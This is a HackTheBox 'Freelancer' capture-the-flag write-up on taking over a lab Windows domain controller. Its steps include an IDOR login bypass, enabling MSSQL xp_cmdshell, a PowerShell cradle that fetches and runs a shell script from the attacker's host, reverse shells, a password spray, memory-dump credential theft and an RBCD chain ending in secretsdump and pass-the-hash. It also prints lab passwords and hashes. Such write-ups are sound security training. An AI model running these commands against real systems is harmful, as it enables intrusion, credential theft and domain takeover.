HTB: Freelancer

June 6, 2024 HackTheBox Windows Hard IDOR MSSQL RBCD 15 min read

Freelancer starts with gaining access as an employer, then escalating to admin via an IDOR vulnerability in the QR-Code OTP login flow. From there, a SQL terminal exposes MSSQL commands allowing impersonation of sa and enabling xp_cmdshell for a reverse shell. After pivoting through users via credential files and a memory dump, the path to Domain Admin goes through Resource-Based Constrained Delegation (RBCD).

Freelancer reg → Employer (IDOR) → Admin → sql_svc (MSSQL) → mikasaAckerman → lorra199 → SYSTEM (RBCD)

Reconnaissance

Nmap

Full port scan reveals a Windows domain controller. Notable: MSSQL on port 55297 and WinRM on 5985.

nmap

SP1R4@kali)-[~] └$ nmap -sC -sV -p- -oN nmap_results.txt 10.129.159.108 PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 80/tcp open http nginx 1.25.5 88/tcp open kerberos-sec Microsoft Windows Kerberos 135/tcp open msrpc Microsoft Windows RPC 389/tcp open ldap Microsoft Windows Active Directory LDAP 445/tcp open microsoft-ds? 5985/tcp open http Microsoft HTTPAPI httpd 2.0 55297/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00 | DNS_Domain_Name: freelancer.htb | DNS_Computer_Name: DC.freelancer.htb Service Info: Host: DC; OS: Windows

RPC & SMB — Access Denied

rpcclient / smbclient

SP1R4@kali)-[~] └$ rpcclient -U "" -N 10.10.11.5 rpcclient $> enumdomusers result was NT_STATUS_ACCESS_DENIED SP1R4@kali)-[~] └$ smbclient -L 10.10.11.5 Anonymous login successful Unable to connect with SMB1 -- no workgroup available

Website — TCP 80

The site is a job board platform with Freelancer and Employer registration.

Account recovery bypass

Use the Account Recovery form. The security questions accept trivially guessable answers (all set to the same value during registration). This reactivates the account and allows a password reset:

Now inside as employer bob:

IDOR — Insecure Direct Object Reference

QR-Code section

The QR-Code menu item generates an OTP login URL. Scanning reveals the token encodes the current user's numeric ID in base64:

OTP URL format: http://freelancer.htb/accounts/login/otp/<base64_uid>/<token>
Replacing the base64 value with any other user's encoded ID logs in as that user — classic IDOR.

Escalating to admin

Browse blog comments to find the admin username. Profile URL enumeration confirms admin has ID 2. Encode it: echo -n "2" | base64 → Mg==.

IDOR payload

# bob (ID 10011) http://freelancer.htb/accounts/login/otp/MTAwMTE=/e4ff26... # admin (ID 2) http://freelancer.htb/accounts/login/otp/Mgo=/e4ff26...

/admin — SQL Terminal

The admin panel exposes a SQL Terminal under Development Tools:

Admin dashboard with SQL Terminal in Development Tools

Current user

SELECT user_name(); -- Result: Freelancer_webapp_user

SQL terminal showing Freelancer_webapp_user result

Capturing NTLM hash via xp_dirtree

xp_dirtree '\\10.10.14.16\zip'

Responder output capturing NTLM hash from sql_svc

The hash is uncrackable. Pivot to SQL privilege escalation instead.

sa impersonation → sysadmin → xp_cmdshell

Check if sa can be impersonated and if it holds sysadmin rights, then grant them to our user:

-- Verify sa is sysadmin EXECUTE AS LOGIN = 'sa' SELECT IS_SRVROLEMEMBER('sysadmin') -- returns 1 -- Grant sysadmin to webapp user EXECUTE AS LOGIN = 'sa' EXEC sp_addsrvrolemember 'Freelancer_webapp_user', 'sysadmin' -- Enable xp_cmdshell EXEC sp_configure 'show advanced options', '1'; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', '1'; RECONFIGURE;

Initial xp_cmdshell permission denied error

IS_SRVROLEMEMBER returning 1 — sysadmin confirmed

xp_cmdshell whoami showing freelancer\sql_svc

Reverse shell

Direct shells are blocked by AV. Use a PowerShell download-cradle:

EXEC xp_cmdshell 'powershell -c "IEX (iwr -usebasicparsing http://10.10.14.16/shell.ps1)"'

nc listener

SP1R4@kali)-[~] └$ rlwrap nc -lvnp 4444 connect to [10.10.14.16] from (UNKNOWN) [10.129.159.108] 65419 SHELL>

Shell obtained as freelancer\sql_svc.

Lateral Movement — sql_svc → mikasaAckerman

Plaintext creds in SQL config

sql-Configuration.INI

SHELL> type C:\Users\sql_svc\Downloads\SQLEXPR-2019_x64_ENU\sql-Configuration.INI SQLSVCACCOUNT="FREELANCER\sql_svc" SQLSVCPASSWORD="IL0v3ErenY3ager" SAPWD="t3mp0r@ryS@PWD"

crackmapexec — password spray

SP1R4@kali)-[~] └$ crackmapexec smb 10.129.171.125 -u users.txt -p IL0v3ErenY3ager SMB DC [-] freelancer.htb\sql_svc SMB DC [-] freelancer.htb\Administrator SMB DC [+] freelancer.htb\mikasaAckerman:IL0v3ErenY3ager

RunasCs — pivot to mikasaAckerman

SHELL> certutil -split -f -urlcache http://10.10.14.16/RunasCs.exe SHELL> .\RunasCs.exe mikasaAckerman IL0v3ErenY3ager cmd.exe -r 10.10.14.16:9001 SP1R4@kali)-[~] └$ rlwrap nc -lvnp 9001 C:\WINDOWS\system32> whoami freelancer\mikasaackerman

Lateral Movement — mikasaAckerman → lorra199

mail.txt

PS C:\Users\mikasaAckerman\Desktop> type mail.txt Hello Mikasa, Liza has requested me to generate a full memory dump on the DC. The file is on the Desktop.

A memory dump (MEMORY.7z) is on the Desktop. Extract it, run Mimikatz to isolate lsass.exe, then extract lorra199's password from the SAM:

evil-winrm — lorra199

SP1R4@kali)-[~] └$ evil-winrm -i 10.129.171.125 -u lorra199 -p 'PWN3D#l0rr@Armessa' *Evil-WinRM* PS C:\Users\lorra199\Documents>

Shell obtained as lorra199.

Bloodhound Enumeration

bloodhound-python

SP1R4@kali)-[~] └$ bloodhound-python -c ALL -u lorra199 -p 'PWN3D#l0rr@Armessa' -d freelancer.htb -ns 10.129.171.125

lorra199 is a member of AD Recycle Bin:

Bloodhound: lorra199 MemberOf AD Recycle Bin

AD Recycle Bin has GenericWrite on the Domain Controller DC$:

GenericWrite on DC$ enables RBCD abuse — we can set the msDS-AllowedToActOnBehalfOfOtherIdentity attribute and impersonate any user including Administrator.

Privilege Escalation — RBCD → Domain Admin

RBCD full chain

# 1. Add fake computer account SP1R4@kali)-[~] └$ impacket-addcomputer -computer-name 'ATTACKERSYSTEM$' -computer-pass 'Summer2018!' -dc-ip 10.129.171.125 'freelancer.htb/lorra199:PWN3D#l0rr@Armessa' [*] Successfully added machine account ATTACKERSYSTEM$ # 2. Write delegation attribute SP1R4@kali)-[~] └$ impacket-rbcd -delegate-from 'ATTACKERSYSTEM$' -delegate-to 'DC$' -action 'write' 'freelancer.htb/lorra199:PWN3D#l0rr@Armessa' [*] ATTACKERSYSTEM$ can now impersonate users on DC$ via S4U2Proxy # 3. Sync clock + get service ticket SP1R4@kali)-[~] └$ systemctl stop systemd-timesyncd && ntpdate -u 10.129.171.125 SP1R4@kali)-[~] └$ impacket-getST -spn 'cifs/DC.freelancer.htb' -impersonate Administrator -dc-ip 10.129.171.125 'freelancer.htb/ATTACKERSYSTEM$:Summer2018!' [*] Saving ticket in Administrator.ccache # 4. Dump domain credentials SP1R4@kali)-[~] └$ export KRB5CCNAME=Administrator.ccache SP1R4@kali)-[~] └$ impacket-secretsdump 'freelancer.htb/Administrator@DC.freelancer.htb' -k -no-pass Administrator:500:aad3b435b51404eeaad3b435b51404ee:0039318f1e827463344... # 5. Pass-the-Hash SP1R4@kali)-[~] └$ evil-winrm -i 10.129.171.125 -u Administrator -H 0039318f1e827463344... *Evil-WinRM* PS C:\Users\Administrator\Documents> └$ type C:\Users\Administrator\Desktop\root.txt d5be56ad************************

🚩 Root flag captured. Domain compromised.

Summary

Stage	Technique	Tool
Foothold	Employer account recovery via trivial security Q&A	Browser
Admin access	IDOR via base64 user ID in OTP URL	Browser
Shell	MSSQL sa impersonation → xp_cmdshell → PS cradle	SQL Terminal, nc
Lateral (mikasa)	Plaintext creds in SQL config INI + RunasCs	crackmapexec
Lateral (lorra)	Memory dump → Mimikatz → lsass → SAM	Mimikatz
Domain Admin	RBCD abuse via GenericWrite on DC$	impacket suite

Key commands

quick reference

# MSSQL privilege escalation EXECUTE AS LOGIN = 'sa'; EXEC sp_addsrvrolemember 'user', 'sysadmin' EXEC sp_configure 'xp_cmdshell', '1'; RECONFIGURE # RBCD chain impacket-addcomputer # add fake machine account impacket-rbcd # write delegation attribute on DC$ ntpdate -u <DC_IP> # sync clock (avoid KRB_AP_ERR_SKEW) impacket-getST # get Administrator service ticket impacket-secretsdump # dump NTDS via DRSUAPI evil-winrm -H <hash> # pass-the-hash as Administrator